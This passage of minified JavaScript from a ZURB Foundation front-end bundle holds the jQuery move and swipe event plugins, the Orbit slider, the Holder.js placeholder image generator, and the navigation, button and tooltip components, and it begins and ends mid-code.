n=e(this),r=n.closest("div.custom.dropdown"),i=r.prev(),s=0;t.preventDefault(),t.stopPropagation(),e("div.dropdown").removeClass("open"),n.closest("ul").find("li").removeClass("selected"),n.addClass("selected"),r.removeClass("open").find("a.current").html(n.html()),n.closest("ul").find("li").each(function(e){n[0]==this&&(s=e)}),i[0].selectedIndex=s,i.trigger("change")}),e.fn.foundationCustomForms=e.foundation.customForms.appendCustomMarkup})(jQuery); // jquery.event.move // // 1.3.1 // // Stephen Band // // Triggers 'movestart', 'move' and 'moveend' events after // mousemoves following a mousedown cross a distance threshold, // similar to the native 'dragstart', 'drag' and 'dragend' events. // Move events are throttled to animation frames. Move event objects // have the properties: // // pageX: // pageY: Page coordinates of pointer. // startX: // startY: Page coordinates of pointer at movestart. // distX: // distY: Distance the pointer has moved since movestart. // deltaX: // deltaY: Distance the finger has moved since last event. // velocityX: // velocityY: Average velocity over last few events. (function(e){typeof define=="function"&&define.amd?define(["jquery"],e):e(jQuery)})(function(e,t){function l(e){function i(e){n?(t(),o(i),r=!0,n=!1):r=!1}var t=e,n=!1,r=!1;this.kick=function(e){n=!0,r||i()},this.end=function(e){var i=t;if(!e)return;r?(t=n?function(){i(),e()}:e,n=!0):e()}}function c(){return!0}function h(){return!1}function p(e){e.preventDefault()}function d(e){if(u[e.target.tagName.toLowerCase()])return;e.preventDefault()}function v(e){return e.which===1&&!e.ctrlKey&&!e.altKey}function m(e,t){var n,r;if(e.identifiedTouch)return e.identifiedTouch(t);n=-1,r=e.length;while(++n<r)if(e[n].identifier===t)return e[n]}function g(e,t){var n=m(e.changedTouches,t.identifier);if(!n)return;if(n.pageX===t.pageX&&n.pageY===t.pageY)return;return n}function y(e){var t;if(!v(e))return;t={target:e.target,startX:e.pageX,startY:e.pageY,timeStamp:e.timeStamp},r(document,a.move,b,t),r(document,a.cancel,w,t)}function b(e){var t=e.data;C(e,t,e,E)}function w(e){E()}function E(){i(document,a.move,b),i(document,a.cancel,E)}function S(e){var t,n;if(u[e.target.tagName.toLowerCase()])return;t=e.changedTouches[0],n={target:t.target,startX:t.pageX,startY:t.pageY,timeStamp:e.timeStamp,identifier:t.identifier},r(document,f.move+"."+t.identifier,x,n),r(document,f.cancel+"."+t.identifier,T,n)}function x(e){var t=e.data,n=g(e,t);if(!n)return;C(e,t,n,N)}function T(e){var t=e.data,n=m(e.changedTouches,t.identifier);if(!n)return;N(t.identifier)}function N(e){i(document,"."+e,x),i(document,"."+e,T)}function C(e,t,r,i){var s=r.pageX-t.startX,o=r.pageY-t.startY;if(s*s+o*o<n*n)return;A(e,t,r,s,o,i)}function k(){return this._handled=c,!1}function L(e){e._handled()}function A(e,t,n,r,i,o){var u=t.target,a,f;a=e.targetTouches,f=e.timeStamp-t.timeStamp,t.type="movestart",t.distX=r,t.distY=i,t.deltaX=r,t.deltaY=i,t.pageX=n.pageX,t.pageY=n.pageY,t.velocityX=r/f,t.velocityY=i/f,t.targetTouches=a,t.finger=a?a.length:1,t._handled=k,t._preventTouchmoveDefault=function(){e.preventDefault()},s(t.target,t),o(t.identifier)}function O(e){var t=e.data.event,n=e.data.timer;B(t,e,e.timeStamp,n)}function M(e){var t=e.data.event,n=e.data.timer;_(),j(t,n,function(){setTimeout(function(){i(t.target,"click",h)},0)})}function _(e){i(document,a.move,O),i(document,a.end,M)}function D(e){var t=e.data.event,n=e.data.timer,r=g(e,t);if(!r)return;e.preventDefault(),t.targetTouches=e.targetTouches,B(t,r,e.timeStamp,n)}function P(e){var t=e.data.event,n=e.data.timer,r=m(e.changedTouches,t.identifier);if(!r)return;H(t),j(t,n)}function H(e){i(document,"."+e.identifier,D),i(document,"."+e.identifier,P)}function B(e,t,n,r){var i=n-e.timeStamp;e.type="move",e.distX=t.pageX-e.startX,e.distY=t.pageY-e.startY,e.deltaX=t.pageX-e.pageX,e.deltaY=t.pageY-e.pageY,e.velocityX=.3*e.velocityX+.7*e.deltaX/i,e.velocityY=.3*e.velocityY+.7*e.deltaY/i,e.pageX=t.pageX,e.pageY=t.pageY,r.kick()}function j(e,t,n){t.end(function(){return e.type="moveend",s(e.target,e),n&&n()})}function F(e,t,n){return r(this,"movestart.move",L),!0}function I(e){return i(this,"dragstart drag",p),i(this,"mousedown touchstart",d),i(this,"movestart",L),!0}function q(e){if(e.namespace==="move"||e.namespace==="moveend")return;r(this,"dragstart."+e.guid+" drag."+e.guid,p,t,e.selector),r(this,"mousedown."+e.guid,d,t,e.selector)}function R(e){if(e.namespace==="move"||e.namespace==="moveend")return;i(this,"dragstart."+e.guid+" drag."+e.guid),i(this,"mousedown."+e.guid)}var n=6,r=e.event.add,i=e.event.remove,s=function(t,n,r){e.event.trigger(n,r,t)},o=function(){return window.requestAnimationFrame||window.webkitRequestAnimationFrame||window.mozRequestAnimationFrame||window.oRequestAnimationFrame||window.msRequestAnimationFrame||function(e,t){return window.setTimeout(function(){e()},25)}}(),u={textarea:!0,input:!0,select:!0,button:!0},a={move:"mousemove",cancel:"mouseup dragstart",end:"mouseup"},f={move:"touchmove",cancel:"touchend",end:"touchend"};e.event.special.movestart={setup:F,teardown:I,add:q,remove:R,_default:function(e){var n,i;if(!e._handled())return;n={target:e.target,startX:e.startX,startY:e.startY,pageX:e.pageX,pageY:e.pageY,distX:e.distX,distY:e.distY,deltaX:e.deltaX,deltaY:e.deltaY,velocityX:e.velocityX,velocityY:e.velocityY,timeStamp:e.timeStamp,identifier:e.identifier,targetTouches:e.targetTouches,finger:e.finger},i={event:n,timer:new l(function(t){s(e.target,n)})},e.identifier===t?(r(e.target,"click",h),r(document,a.move,O,i),r(document,a.end,M,i)):(e._preventTouchmoveDefault(),r(document,f.move+"."+e.identifier,D,i),r(document,f.end+"."+e.identifier,P,i))}},e.event.special.move={setup:function(){r(this,"movestart.move",e.noop)},teardown:function(){i(this,"movestart.move",e.noop)}},e.event.special.moveend={setup:function(){r(this,"movestart.moveend",e.noop)},teardown:function(){i(this,"movestart.moveend",e.noop)}},r(document,"mousedown.move",y),r(document,"touchstart.move",S),typeof Array.prototype.indexOf=="function"&&function(e,t){var n=["changedTouches","targetTouches"],r=n.length;while(r--)e.event.props.indexOf(n[r])===-1&&e.event.props.push(n[r])}(e)}); // jQuery.event.swipe // 0.5 // Stephen Band // Dependencies // jQuery.event.move 1.2 // One of swipeleft, swiperight, swipeup or swipedown is triggered on // moveend, when the move has covered a threshold ratio of the dimension // of the target node, or has gone really fast. Threshold and velocity // sensitivity changed with: // // jQuery.event.special.swipe.settings.threshold // jQuery.event.special.swipe.settings.sensitivity (function(e){typeof define=="function"&&define.amd?define(["jquery"],e):e(jQuery)})(function(e,t){function o(e){var t,n,r;t=e.target.offsetWidth,n=e.target.offsetHeight,r={distX:e.distX,distY:e.distY,velocityX:e.velocityX,velocityY:e.velocityY,finger:e.finger};if(e.distX>e.distY){if(e.distX>-e.distY){if(e.distX/t>s.threshold||e.velocityX*e.distX/t*s.sensitivity>1)r.type="swiperight",i(e.currentTarget,r)}else if(-e.distY/n>s.threshold||e.velocityY*e.distY/t*s.sensitivity>1)r.type="swipeup",i(e.currentTarget,r)}else if(e.distX>-e.distY){if(e.distY/n>s.threshold||e.velocityY*e.distY/t*s.sensitivity>1)r.type="swipedown",i(e.currentTarget,r)}else if(-e.distX/t>s.threshold||e.velocityX*e.distX/t*s.sensitivity>1)r.type="swipeleft",i(e.currentTarget,r)}function u(t){var n=e.data(t,"event_swipe");return n||(n={count:0},e.data(t,"event_swipe",n)),n}var n=e.event.add,r=e.event.remove,i=function(t,n,r){e.event.trigger(n,r,t)},s={threshold:.4,sensitivity:6};e.event.special.swipe=e.event.special.swipeleft=e.event.special.swiperight=e.event.special.swipeup=e.event.special.swipedown={setup:function(e,t,r){var e=u(this);if(e.count++>0)return;return n(this,"moveend",o),!0},teardown:function(){var e=u(this);if(--e.count>0)return;return r(this,"moveend",o),!0},settings:s}}); /* * jQuery Orbit Plugin 1.4.0 * www.ZURB.com/playground * Copyright 2010, ZURB * Free to use under the MIT license. * http://www.opensource.org/licenses/mit-license.php */ (function(e){"use strict";e.fn.findFirstImage=function(){return this.first().find("img").andSelf().filter("img").first()};var t={defaults:{animation:"horizontal-push",animationSpeed:600,timer:!0,advanceSpeed:4e3,pauseOnHover:!1,startClockOnMouseOut:!1,startClockOnMouseOutAfter:1e3,directionalNav:!0,directionalNavRightText:"Right",directionalNavLeftText:"Left",captions:!0,captionAnimation:"fade",captionAnimationSpeed:600,resetTimerOnClick:!1,bullets:!1,bulletThumbs:!1,bulletThumbLocation:"",bulletThumbsHideOnSmall:!0,afterSlideChange:e.noop,afterLoadComplete:e.noop,fluid:!0,centerBullets:!0,singleCycle:!1,slideNumber:!1,stackOnSmall:!1},activeSlide:0,numberSlides:0,orbitWidth:null,orbitHeight:null,locked:null,timerRunning:null,degrees:0,wrapperHTML:'<div class="orbit-wrapper" />',timerHTML:'<div class="timer"><span class="mask"><span class="rotator"></span></span><span class="pause"></span></div>',captionHTML:'<div class="orbit-caption"></div>',directionalNavHTML:'<div class="slider-nav hide-for-small"><span class="right"></span><span class="left"></span></div>',bulletHTML:'<ul class="orbit-bullets"></ul>',slideNumberHTML:'<span class="orbit-slide-counter"></span>',init:function(t,n){var r,i=0,s=this;this.clickTimer=e.proxy(this.clickTimer,this),this.addBullet=e.proxy(this.addBullet,this),this.resetAndUnlock=e.proxy(this.resetAndUnlock,this),this.stopClock=e.proxy(this.stopClock,this),this.startTimerAfterMouseLeave=e.proxy(this.startTimerAfterMouseLeave,this),this.clearClockMouseLeaveTimer=e.proxy(this.clearClockMouseLeaveTimer,this),this.rotateTimer=e.proxy(this.rotateTimer,this),this.options=e.extend({},this.defaults,n),this.options.timer==="false"&&(this.options.timer=!1),this.options.captions==="false"&&(this.options.captions=!1),this.options.directionalNav==="false"&&(this.options.directionalNav=!1),this.$element=e(t),this.$wrapper=this.$element.wrap(this.wrapperHTML).parent(),this.$slides=this.$element.children("img, a, div, figure, li"),this.$element.on("movestart",function(e){(e.distX>e.distY&&e.distX<-e.distY||e.distX<e.distY&&e.distX>-e.distY)&&e.preventDefault()}),this.$element.bind("orbit.next",function(){s.shift("next")}),this.$element.bind("orbit.prev",function(){s.shift("prev")}),this.$element.bind("swipeleft",function(){e(this).trigger("orbit.next")}),this.$element.bind("swiperight",function(){e(this).trigger("orbit.prev")}),this.$element.bind("orbit.goto",function(e,t){s.shift(t)}),this.$element.bind("orbit.start",function(e,t){s.startClock()}),this.$element.bind("orbit.stop",function(e,t){s.stopClock()}),r=this.$slides.filter("img"),r.length===0?this.loaded():r.bind("imageready",function(){i+=1,i===r.length&&s.loaded()})},loaded:function(){this.$element.addClass("orbit").css({width:"1px",height:"1px"}),this.options.stackOnSmall&&this.$element.addClass("orbit-stack-on-small"),this.$slides.addClass("orbit-slide").css({opacity:0}),this.setDimentionsFromLargestSlide(),this.updateOptionsIfOnlyOneSlide(),this.setupFirstSlide(),this.notifySlideChange(),this.options.timer&&(this.setupTimer(),this.startClock()),this.options.captions&&this.setupCaptions(),this.options.directionalNav&&this.setupDirectionalNav(),this.options.bullets&&(this.setupBulletNav(),this.setActiveBullet()),this.options.afterLoadComplete.call(this),Holder.run()},currentSlide:function(){return this.$slides.eq(this.activeSlide)},notifySlideChange:function(){if(this.options.slideNumber){var t=this.activeSlide+1+" of "+this.$slides.length;this.$element.trigger("orbit.change",{slideIndex:this.activeSlide,slideCount:this.$slides.length});if(this.$counter===undefined){var n=e(this.slideNumberHTML).html(t);this.$counter=n,this.$wrapper.append(this.$counter)}else this.$counter.html(t)}},setDimentionsFromLargestSlide:function(){var t=this,n;t.$element.add(t.$wrapper).width(this.$slides.first().outerWidth()),t.$element.add(t.$wrapper).height(this.$slides.first().height()),t.orbitWidth=this.$slides.first().outerWidth(),t.orbitHeight=this.$slides.first().height(),n=this.$slides.first().findFirstImage().clone(),this.$slides.each(function(){var r=e(this),i=r.outerWidth(),s=r.height();i>t.$element.outerWidth()&&(t.$element.add(t.$wrapper).width(i),t.orbitWidth=t.$element.outerWidth()),s>t.$element.height()&&(t.$element.add(t.$wrapper).height(s),t.orbitHeight=t.$element.height(),n=e(this).findFirstImage().clone()),t.numberSlides+=1}),this.options.fluid&&(typeof this.options.fluid=="string"&&(n=e("<img>").attr("data-src","holder.js/"+this.options.fluid)),t.$element.prepend(n),n.addClass("fluid-placeholder"),t.$element.add(t.$wrapper).css({width:"inherit"}),t.$element.add(t.$wrapper).css({height:"inherit"}),e(window).bind("resize",function(){t.orbitWidth=t.$element.outerWidth(),t.orbitHeight=t.$element.height()}))},lock:function(){this.locked=!0},unlock:function(){this.locked=!1},updateOptionsIfOnlyOneSlide:function(){this.$slides.length===1&&(this.options.directionalNav=!1,this.options.timer=!1,this.options.bullets=!1)},setupFirstSlide:function(){var e=this;this.$slides.first().css({"z-index":3,opacity:1}).fadeIn(function(){e.$slides.css({display:"block"})})},startClock:function(){var e=this;if(!this.options.timer)return!1;this.$timer.is(":hidden")?this.clock=setInterval(function(){e.$element.trigger("orbit.next")},this.options.advanceSpeed):(this.timerRunning=!0,this.$pause.removeClass("active"),this.clock=setInterval(this.rotateTimer,this.options.advanceSpeed/180,!1))},rotateTimer:function(e){var t="rotate("+this.degrees+"deg)";this.degrees+=2,this.$rotator.css({"-webkit-transform":t,"-moz-transform":t,"-o-transform":t,"-ms-transform":t}),e&&(this.degrees=0,this.$rotator.removeClass("move"),this.$mask.removeClass("move")),this.degrees>180&&(this.$rotator.addClass("move"),this.$mask.addClass("move")),this.degrees>360&&(this.$rotator.removeClass("move"),this.$mask.removeClass("move"),this.degrees=0,this.$element.trigger("orbit.next"))},stopClock:function(){if(!this.options.timer)return!1;this.timerRunning=!1,clearInterval(this.clock),this.$pause.addClass("active")},setupTimer:function(){this.$timer=e(this.timerHTML),this.$wrapper.append(this.$timer),this.$rotator=this.$timer.find(".rotator"),this.$mask=this.$timer.find(".mask"),this.$pause=this.$timer.find(".pause"),this.$timer.click(this.clickTimer),this.options.startClockOnMouseOut&&(this.$wrapper.mouseleave(this.startTimerAfterMouseLeave),this.$wrapper.mouseenter(this.clearClockMouseLeaveTimer)),this.options.pauseOnHover&&this.$wrapper.mouseenter(this.stopClock)},startTimerAfterMouseLeave:function(){var e=this;this.outTimer=setTimeout(function(){e.timerRunning||e.startClock()},this.options.startClockOnMouseOutAfter)},clearClockMouseLeaveTimer:function(){clearTimeout(this.outTimer)},clickTimer:function(){this.timerRunning?this.stopClock():this.startClock()},setupCaptions:function(){this.$caption=e(this.captionHTML),this.$wrapper.append(this.$caption),this.setCaption()},setCaption:function(){var t=this.currentSlide().attr("data-caption"),n;if(!this.options.captions)return!1;if(t){if(e.trim(e(t).text()).length<1)return!1;t.charAt(0)=="#"&&(t=t.substring(1,t.length)),n=e("#"+t).html(),this.$caption.attr("id",t).html(n);switch(this.options.captionAnimation){case"none":this.$caption.show();break;case"fade":this.$caption.fadeIn(this.options.captionAnimationSpeed);break;case"slideOpen":this.$caption.slideDown(this.options.captionAnimationSpeed)}}else switch(this.options.captionAnimation){case"none":this.$caption.hide();break;case"fade":this.$caption.fadeOut(this.options.captionAnimationSpeed);break;case"slideOpen":this.$caption.slideUp(this.options.captionAnimationSpeed)}},setupDirectionalNav:function(){var t=this,n=e(this.directionalNavHTML);n.find(".right").html(this.options.directionalNavRightText),n.find(".left").html(this.options.directionalNavLeftText),this.$wrapper.append(n),this.$wrapper.find(".left").click(function(){t.stopClock(),t.options.resetTimerOnClick&&(t.rotateTimer(!0),t.startClock()),t.$element.trigger("orbit.prev")}),this.$wrapper.find(".right").click(function(){t.stopClock(),t.options.resetTimerOnClick&&(t.rotateTimer(!0),t.startClock()),t.$element.trigger("orbit.next")})},setupBulletNav:function(){this.$bullets=e(this.bulletHTML),this.$wrapper.append(this.$bullets),this.$slides.each(this.addBullet),this.$element.addClass("with-bullets"),this.options.centerBullets&&this.$bullets.css("margin-left",-this.$bullets.outerWidth()/2),this.options.bulletThumbsHideOnSmall&&this.$bullets.addClass("hide-for-small")},addBullet:function(t,n){var r=t+1,i=e("<li>"+r+"</li>"),s,o=this;this.options.bulletThumbs&&(s=e(n).attr("data-thumb"),s&&i.addClass("has-thumb").css({background:"url("+this.options.bulletThumbLocation+s+") no-repeat"})),this.$bullets.append(i),i.data("index",t),i.click(function(){o.stopClock(),o.options.resetTimerOnClick&&(o.rotateTimer(!0),o.startClock()),o.$element.trigger("orbit.goto",[i.data("index")])})},setActiveBullet:function(){if(!this.options.bullets)return!1;this.$bullets.find("li").removeClass("active").eq(this.activeSlide).addClass("active")},resetAndUnlock:function(){this.$slides.eq(this.prevActiveSlide).css({"z-index":1}),this.unlock(),this.options.afterSlideChange.call(this,this.$slides.eq(this.prevActiveSlide),this.$slides.eq(this.activeSlide))},shift:function(t){var n=t;this.prevActiveSlide=this.activeSlide;if(this.prevActiveSlide==n)return!1;if(this.$slides.length=="1")return!1;this.locked||(this.lock(),t=="next"?(this.activeSlide++,this.activeSlide==this.numberSlides&&(this.activeSlide=0)):t=="prev"?(this.activeSlide--,this.activeSlide<0&&(this.activeSlide=this.numberSlides-1)):(this.activeSlide=t,this.prevActiveSlide<this.activeSlide?n="next":this.prevActiveSlide>this.activeSlide&&(n="prev")),this.setActiveBullet(),this.notifySlideChange(),this.$slides.eq(this.prevActiveSlide).css({"z-index":2}),this.options.animation=="fade"&&(this.$slides.eq(this.activeSlide).css({opacity:0,"z-index":3}).animate({opacity:1},this.options.animationSpeed,this.resetAndUnlock),this.$slides.eq(this.prevActiveSlide).animate({opacity:0},this.options.animationSpeed)),this.options.animation=="horizontal-slide"&&(n=="next"&&this.$slides.eq(this.activeSlide).css({left:this.orbitWidth,"z-index":3}).css("opacity",1).animate({left:0},this.options.animationSpeed,this.resetAndUnlock),n=="prev"&&this.$slides.eq(this.activeSlide).css({left:-this.orbitWidth,"z-index":3}).css("opacity",1).animate({left:0},this.options.animationSpeed,this.resetAndUnlock),this.$slides.eq(this.prevActiveSlide).css("opacity",0)),this.options.animation=="vertical-slide"&&(n=="prev"&&(this.$slides.eq(this.activeSlide).css({top:this.orbitHeight,"z-index":3}).css("opacity",1).animate({top:0},this.options.animationSpeed,this.resetAndUnlock),this.$slides.eq(this.prevActiveSlide).css("opacity",0)),n=="next"&&this.$slides.eq(this.activeSlide).css({top:-this.orbitHeight,"z-index":3}).css("opacity",1).animate({top:0},this.options.animationSpeed,this.resetAndUnlock),this.$slides.eq(this.prevActiveSlide).css("opacity",0)),this.options.animation=="horizontal-push"&&(n=="next"&&(this.$slides.eq(this.activeSlide).css({left:this.orbitWidth,"z-index":3}).animate({left:0,opacity:1},this.options.animationSpeed,this.resetAndUnlock),this.$slides.eq(this.prevActiveSlide).animate({left:-this.orbitWidth},this.options.animationSpeed,"",function(){e(this).css({opacity:0})})),n=="prev"&&(this.$slides.eq(this.activeSlide).css({left:-this.orbitWidth,"z-index":3}).animate({left:0,opacity:1},this.options.animationSpeed,this.resetAndUnlock),this.$slides.eq(this.prevActiveSlide).animate({left:this.orbitWidth},this.options.animationSpeed,"",function(){e(this).css({opacity:0})}))),this.options.animation=="vertical-push"&&(n=="next"&&(this.$slides.eq(this.activeSlide).css({top:-this.orbitHeight,"z-index":3}).css("opacity",1).animate({top:0,opacity:1},this.options.animationSpeed,this.resetAndUnlock),this.$slides.eq(this.prevActiveSlide).css("opacity",0).animate({top:this.orbitHeight},this.options.animationSpeed,"")),n=="prev"&&(this.$slides.eq(this.activeSlide).css({top:this.orbitHeight,"z-index":3}).css("opacity",1).animate({top:0},this.options.animationSpeed,this.resetAndUnlock),this.$slides.eq(this.prevActiveSlide).css("opacity",0).animate({top:-this.orbitHeight},this.options.animationSpeed))),this.setCaption()),this.activeSlide===this.$slides.length-1&&this.options.singleCycle&&this.stopClock()}};e.fn.orbit=function(n){return this.each(function(){var r=e.extend({},t);r.init(this,n)})}})(jQuery),function(e){function n(t,n){var r=e(t);r.bind("load.imageready",function(){n.apply(t,arguments),r.unbind("load.imageready")})}var t={};e.event.special.imageready={setup:function(e,n,r){t=e||t},add:function(r){var i=e(this),s;this.nodeType===1&&this.tagName.toLowerCase()==="img"&&this.src!==""&&(t.forceLoad?(s=i.attr("src"),i.attr("src",""),n(this,r.handler),i.attr("src",s)):this.complete||this.readyState===4?r.handler.apply(this,arguments):n(this,r.handler))},teardown:function(t){e(this).unbind(".imageready")}}}(jQuery);var Holder=Holder||{};(function(e,t){function s(e,t){var n="complete",r="readystatechange",i=!1,s=i,o=!0,u=e.document,a=u.documentElement,f=u.addEventListener?"addEventListener":"attachEvent",l=u.addEventListener?"removeEventListener":"detachEvent",c=u.addEventListener?"":"on",h=function(o){(o.type!=r||u.readyState==n)&&((o.type=="load"?e:u)[l](c+o.type,h,i),!s&&(s=!0)&&t.call(e,null))},p=function(){try{a.doScroll("left")}catch(e){setTimeout(p,50);return}h("poll")};if(u.readyState==n)t.call(e,"lazy");else{if(u.createEventObject&&a.doScroll){try{o=!e.frameElement}catch(d){}o&&p()}u[f](c+"DOMContentLoaded",h,i),u[f](c+r,h,i),e[f](c+"load",h,i)}}function o(e){e=e.match(/^(\W)?(.*)/);var t=document["getElement"+(e[1]?e[1]=="#"?"ById":"sByClassName":"sByTagName")](e[2]),n=[];return t!=null&&(t.length?n=t:t.length==0?n=t:n=[t]),n}function u(e,t){var n={};for(var r in e)n[r]=e[r];for(var i in t)n[i]=t[i];return n}function a(e,t,n){var r=[t.height,t.width].sort(),s=Math.round(r[1]/16),o=Math.round(r[0]/16),u=Math.max(n.size,s);i.width=t.width,i.height=t.height,e.textAlign="center",e.textBaseline="middle",e.fillStyle=n.background,e.fillRect(0,0,t.width,t.height),e.fillStyle=n.foreground,e.font="bold "+u+"px sans-serif";var a=n.text?n.text:t.width+"x"+t.height;return Math.round(e.measureText(a).width)/t.width>1&&(u=Math.max(o,n.size)),e.font="bold "+u+"px sans-serif",e.fillText(a,t.width/2,t.height/2,t.width),i.toDataURL("image/png")}var n=!1,r=!1,i=document.createElement("canvas");if(!i.getContext)r=!0;else if(i.toDataURL("image/png").indexOf("data:image/png")<0)r=!0;else var f=i.getContext("2d");var l={domain:"holder.js",images:"img",themes:{gray:{background:"#eee",foreground:"#aaa",size:12},social:{background:"#3a5a97",foreground:"#fff",size:12},industrial:{background:"#434A52",foreground:"#C2F200",size:12}}};e.flags={dimensions:{regex:/([0-9]+)x([0-9]+)/,output:function(e){var t=this.regex.exec(e);return{width:+t[1],height:+t[2]}}},colors:{regex:/#([0-9a-f]{3,})\:#([0-9a-f]{3,})/i,output:function(e){var t=this.regex.exec(e);return{size:l.themes.gray.size,foreground:"#"+t[2],background:"#"+t[1]}}},text:{regex:/text\:(.*)/,output:function(e){return this.regex.exec(e)[1]}}};for(var c in e.flags)e.flags[c].match=function(e){return e.match(this.regex)};e.add_theme=function(t,n){return t!=null&&n!=null&&(l.themes[t]=n),e},e.add_image=function(t,n){var r=o(n);if(r.length)for(var i=0,s=r.length;i<s;i++){var u=document.createElement("img");u.setAttribute("data-src",t),r[i].appendChild(u)}return e},e.run=function(t){var n=u(l,t),i=o(n.images),s=!0;for(var c=i.length,h=0;h<c;h++){var p=l.themes.gray,d=i[h].getAttribute("data-src")||i[h].getAttribute("src");if(d&&!!~d.indexOf(n.domain)){var v=!1,m=null,g=null,y=d.substr(d.indexOf(n.domain)+n.domain.length+1).split("/");for(sl=y.length,j=0;j<sl;j++)e.flags.dimensions.match(y[j])?(v=!0,m=e.flags.dimensions.output(y[j])):e.flags.colors.match(y[j])?p=e.flags.colors.output(y[j]):n.themes[y[j]]?p=n.themes[y[j]]:e.flags.text.match(y[j])&&(g=e.flags.text.output(y[j]));if(v){i[h].setAttribute("data-src",d);var b=m.width+"x"+m.height;i[h].setAttribute("alt",g?g:p.text?p.text+" ["+b+"]":b),i[h].style.backgroundColor=p.background;var p=g?u(p,{text:g}):p;r||i[h].setAttribute("src",a(f,m,p))}}}return e},s(t,function(){n||e.run()})})(Holder,window); (function(e,t,n){"use strict";e.fn.foundationNavigation=function(t){var n=!1;Modernizr.touch||navigator.userAgent.match(/Windows Phone/i)?(e(document).on("click.fndtn touchstart.fndtn",".nav-bar a.flyout-toggle",function(t){t.preventDefault();var r=e(this).siblings(".flyout").first();n===!1&&(e(".nav-bar .flyout").not(r).slideUp(500),r.slideToggle(500,function(){n=!1})),n=!0}),e(".nav-bar>li.has-flyout",this).addClass("is-touch")):e(".nav-bar>li.has-flyout",this).on("mouseenter mouseleave",function(t){t.type=="mouseenter"&&(e(".nav-bar").find(".flyout").hide(),e(this).children(".flyout").show());if(t.type=="mouseleave"){var n=e(this).children(".flyout"),r=n.find("input"),i=function(t){var n;return t.length>0?(t.each(function(){e(this).is(":focus")&&(n=!0)}),n):!1};i(r)||e(this).children(".flyout").hide()}})}})(jQuery,this); (function(e,t,n){"use strict";e.fn.foundationButtons=function(t){var r=e(document),i=e.extend({dropdownAsToggle:!1,activeClass:"active"},t),s=function(t){e(".button.dropdown").find("ul").not(t).removeClass("show-dropdown")},o=function(t){var n=e(".button.dropdown").not(t);n.add(e("> span."+i.activeClass,n)).removeClass(i.activeClass)};r.on("click.fndtn",".button.disabled",function(e){e.preventDefault()}),e(".button.dropdown > ul",this).addClass("no-hover"),r.on("click.fndtn",".button.dropdown:not(.split), .button.dropdown.split span",function(t){var n=e(this),r=n.closest(".button.dropdown"),u=e("> ul",r);e.inArray(t.target.nodeName,["A","BUTTON"])&&t.preventDefault(),setTimeout(function(){s(i.dropdownAsToggle?"":u),u.toggleClass("show-dropdown"),i.dropdownAsToggle&&(o(r),n.toggleClass(i.activeClass))},0)}),r.on("click.fndtn","body, html",function(t){if(n==t.originalEvent)return;e(t.originalEvent.target).is(".button.dropdown:not(.split), .button.dropdown.split span")||(s(),i.dropdownAsToggle&&o())});var u=e(".button.dropdown:not(.large):not(.small):not(.tiny):visible",this).outerHeight()-1,a=e(".button.large.dropdown:visible",this).outerHeight()-1,f=e(".button.small.dropdown:visible",this).outerHeight()-1,l=e(".button.tiny.dropdown:visible",this).outerHeight()-1;e(".button.dropdown:not(.large):not(.small):not(.tiny) > ul",this).css("top",u),e(".button.dropdown.large > ul",this).css("top",a),e(".button.dropdown.small > ul",this).css("top",f),e(".button.dropdown.tiny > ul",this).css("top",l),e(".button.dropdown.up:not(.large):not(.small):not(.tiny) > ul",this).css("top","auto").css("bottom",u-2),e(".button.dropdown.up.large > ul",this).css("top","auto").css("bottom",a-2),e(".button.dropdown.up.small > ul",this).css("top","auto").css("bottom",f-2),e(".button.dropdown.up.tiny > ul",this).css("top","auto").css("bottom",l-2)}})(jQuery,this); /* * jQuery Foundation Tooltips 2.0.2 * http://foundation.zurb.com * Copyright 2012, ZURB * Free to use under the MIT license. * http://www.opensource.org/licenses/mit-license.php */ /*jslint unparam: true, browser: true, indent: 2 */ (function(e,t,n){"use strict";var r={bodyHeight:0,selector:".has-tip",additionalInheritableClasses:[],tooltipClass:".tooltip",tipTemplate:function(e,t){return'<span data-selector="'+e+'" class="'+r.tooltipClass.substring(1)+'">'+t+'<span class="nub"></span></span>'}},i={init:function(t){return r=e.extend(r,t),r.selector=r.targetClass?r.targetClass:r.selector,this.each(function(){var t=e("body");Modernizr.touch?(t.on("click.tooltip touchstart.tooltip touchend.tooltip",r.selector,function(t){t.preventDefault(),e(r.tooltipClass).hide(),i.showOrCreateTip(e(this))}),t.on("click.tooltip touchstart.tooltip touchend.tooltip",r.tooltipClass,function(t){t.preventDefault(),e(this).fadeOut(150)})):t.on("mouseenter.tooltip mouseleave.tooltip",r.selector,function(t){var n=e(this);t.type==="mouseenter"?i.showOrCreateTip(n):t.type==="mouseleave"&&i.hide(n)}),e(this).data("tooltips",!0)})},showOrCreateTip:function(e,t){var n=i.getTip(e);n&&n.length>0?i.show(e):i.create(e,t)},getTip:function(t){var n=i.selector(t),s=null;return n&&(s=e("span[data-selector="+n+"]"+r.tooltipClass)),s.length>0?s:!1},selector:function(e){var t=e.attr("id"),r=e.data("selector");return t===n&&r===n&&(r="tooltip"+Math.random().toString(36).substring(7),e.attr("data-selector",r)),t?t:r},create:function(t,n){var s=e(r.tipTemplate(i.selector(t),e("<div>").html(n?n:t.attr("title")).html())),o=i.inheritable_classes(t);s.addClass(o).appendTo("body"),Modernizr.touch&&s.append('<span class="tap-to-close">tap to close </span>'),t.removeAttr("title"),i.show(t)},reposition:function(n,r,i){var s,o,u,a,f,l;r.css("visibility","hidden").show(),s=n.data("width"),o=r.children(".nub"),u=o.outerHeight(),a=o.outerWidth(),l=function(e,t,n,r,i,s){return e.css({top:t,bottom:r,left:i,right:n,"max-width":s?s:"auto"}).end()},l(r,n.offset().top+n.outerHeight()+10,"auto","auto",n.offset().left,s),l(o,-u,"auto","auto",10);if(e(t).width()<767){if(n.data("mobile-width"))r.width(n.data("mobile-width")).css("left",15).addClass("tip-override");else{f=n.closest(".columns"),f.length<0&&(f=e("body"));if(f.outerWidth())r.width(f.outerWidth()-25).css("left",15).addClass("tip-override");else{var c=Math.ceil(e(t).width()*.9);r.width(c).css("left",15).addClass("tip-override")}}l(o,-u,"auto","auto",n.offset().left)}else 